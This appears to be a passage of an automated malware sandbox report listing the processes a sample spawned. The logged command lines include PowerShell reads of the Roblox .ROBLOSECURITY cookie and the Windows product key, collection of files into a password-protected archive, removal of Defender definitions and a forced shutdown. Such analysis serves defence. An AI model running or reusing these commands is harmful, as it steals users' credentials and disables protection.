                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                              Start time:13:01:27
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:76
                                                                                                                                                                                                                              Start time:13:01:27
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                              Start time:13:01:27
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                              Start time:13:01:28
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                              Start time:13:01:28
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                              Start time:13:01:28
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                              Start time:13:01:30
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\word.exe"
                                                                                                                                                                                                                              Imagebase:0x6e0000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                              Start time:13:01:36
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                              Start time:13:01:36
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:84
                                                                                                                                                                                                                              Start time:13:01:36
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
                                                                                                                                                                                                                              Imagebase:0x7ff71f090000
                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                              • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:85
                                                                                                                                                                                                                              Start time:13:01:38
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\word.exe"
                                                                                                                                                                                                                              Imagebase:0x9b0000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                              Start time:13:01:38
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                              Start time:13:01:38
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                              Start time:13:01:39
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:wmic os get Caption
                                                                                                                                                                                                                              Imagebase:0x7ff753a70000
                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                              Start time:13:01:40
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                              Imagebase:0x7ff766f80000
                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                              Start time:13:01:40
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:91
                                                                                                                                                                                                                              Start time:13:01:40
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:92
                                                                                                                                                                                                                              Start time:13:01:40
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                              Imagebase:0x7ff753a70000
                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:93
                                                                                                                                                                                                                              Start time:13:01:41
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:94
                                                                                                                                                                                                                              Start time:13:01:41
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:95
                                                                                                                                                                                                                              Start time:13:01:41
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                              Imagebase:0x7ff753a70000
                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:96
                                                                                                                                                                                                                              Start time:13:01:42
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:97
                                                                                                                                                                                                                              Start time:13:01:42
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:98
                                                                                                                                                                                                                              Start time:13:01:43
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:99
                                                                                                                                                                                                                              Start time:13:01:44
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:100
                                                                                                                                                                                                                              Start time:13:01:44
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:101
                                                                                                                                                                                                                              Start time:13:01:44
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0x7ff753a70000
                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:102
                                                                                                                                                                                                                              Start time:13:01:45
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:103
                                                                                                                                                                                                                              Start time:13:01:45
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:104
                                                                                                                                                                                                                              Start time:13:01:45
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:105
                                                                                                                                                                                                                              Start time:13:02:01
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Imagebase:0xf10000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:107
                                                                                                                                                                                                                              Start time:13:03:00
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:108
                                                                                                                                                                                                                              Start time:13:03:30
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\shutdown.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:shutdown.exe /f /s /t 0
                                                                                                                                                                                                                              Imagebase:0x7ff788b10000
                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                              MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:109
                                                                                                                                                                                                                              Start time:13:03:30
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:110
                                                                                                                                                                                                                              Start time:13:04:00
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Imagebase:0xd10000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:111
                                                                                                                                                                                                                              Start time:13:05:00
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:8.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:14.2%
                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                Total number of Limit Nodes:29
